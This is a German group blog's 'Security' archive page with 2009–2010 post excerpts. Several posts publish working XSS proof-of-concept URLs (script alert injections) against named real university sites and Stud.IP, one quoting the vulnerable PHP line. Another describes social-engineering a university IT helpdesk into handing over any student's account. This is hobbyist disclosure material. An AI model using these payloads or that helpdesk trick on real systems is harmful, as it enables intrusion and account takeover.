Browsing the archives for the Security category

16Feb10 Manuel: Little Brother

Ich bin letzte Woche auf Netzpolitik auf das Buch “Little Brother” von Cory Doctorow gestoßen. Cory hat es unter der Creative-Commons veröffentlicht und für die Englisch-Faulen hat sich Christian Wöhrl die Mühe gemacht, es in deutsche Sprache zu übersetzten.
Nach einen Bombenanschlag in seiner Heimatstadt San Francisco wird der 17 jährige, Technik affine Schüler Marcus von [...]

16Nov09 Marvin: XSS auf www.uni-goettingen.de

Wer hätte es auch ahnen können, dass ich mal wieder keine lust auf Zettel habe…
http://www.uni-goettingen.de/de/3240.html?query=asf%22%3E%3Cscript%3Ealert(/xss/);%3C/script%3E&mtyp=&mcat=&mfield=

9Oct09 bine: Datenschutz in Arztpraxen

Ich bin heute zu meinem alten Hausarzt  gegenagen, weil ich meine Krankenakte kopiert bekommen wollte. Das hat auch promt geklappt, ich musste nur meinen Namen angeben (sonst nicht weiter ausweisen) und schon wurde sie mir fuer 10ct pro kopierter Seite ueberreicht. Zuletzt war ich bei diesem Arzt vor drei Jahren und diese Arzthelferin kannte ich [...]

29Jun09 jfe: social engineering bei StudIT

Wolltest du schon mal den zu einer beliebigen Matrikelnummer gehörenden StudIT-Account haben?
StudIT macht(s|e es) möglich!
Man geht einfach zur Beratung, erzählt eine etwas krude Geschichte, dass das GoeMobile-VPN nach einem Passwortwechsel nicht mehr funktioniert und wird dann nach der Matrikelnummer gefragt, hier kann man eine beliebige nennen. Kurze Zeit später kriegt man einen Ausdruck, auf dem [...]

11Jun09 Manuel: Schäuble erlässt Gesetze und versteht nix davon

Bis jetzt dachte ich ja immer, das selbst Schäuble wenigstens eine grobe Vorstellung davon hat, was er tut. Leider wurde ich heute eines Videos gewahr, dass das Gegenteil beweist (Minute: 1:34 – 1:35):

Was soll man jetzt davon halten?! Das fällt selbst mir kein Kommentar mehr ein.
UPDATE: Dazu passend ein schöner Artikel auf Netzpolitik. Es [...]

24Apr09 Marvin: Bash: Passwortgenerator

generate_password()
{
tr -dc “[:alnum:]” < /dev/urandom | head -c “${1}”
}

echo $(generate_password 8 )

28Mar09 Marvin: www.uni-goettingen.de: XSS im Veranstaltungskalender

Ist zwar schon etwas älter, aber immernoch offen: http://www.uni-goettingen.de/de/52739.html?query=%22%3E%3Cscript%3Ealert(%2Fxss%2F)%3B%3C%2Fscript%3E

13Mar09 Manuel: Path-based Authorization at an Apache SVN

Secure your SVN using Apache and path based autorization

11Mar09 Marvin: Stud.IP: XSS (3) in public/sms_box.php

Ich habe keine Ahnung, woher $altm und $neum kommen, aber dank register globals kann ich sie mir auch selbst definieren:
public/sms_box.php:550:
$show_message_count = sprintf(_(“Sie haben %s empfangene und %s gesendete Nachrichten.”), \
($altm+$neum), count_messages_from_user(“snd”));
Beispiel:
https://www.studip.uni-goettingen.de/sms_box.php?neum=%3Cscript%3Ealert(/xss/);%3C/script%3E
(Bei Gelegenheit muss ich mal nachfragen, wieso die Kommentare im Code auf Deutsch sind, der rest des codes aber eher Englisch.)

10Mar09 Marvin: Stud.IP: XSS (2) in vendor/phpxmlrpc/docxmlrpcs.inc

Ich bin mir nicht ganz sicher, wie dieses Script in den vendor-Ordner von studip gelangt, zumindest in der aktuellen Version von phpxmlrpc ist es nicht enthalten. Weiter maskiert es nicht die Eingaben, die direkt via GET ankommen. Beispiel:
https://www.studip.uni-goettingen.de/xmlrpc.php?methodName=%3Cscript%3Ealert(/xss/);%3C/script%3E

Pages (2): 1 2 Next »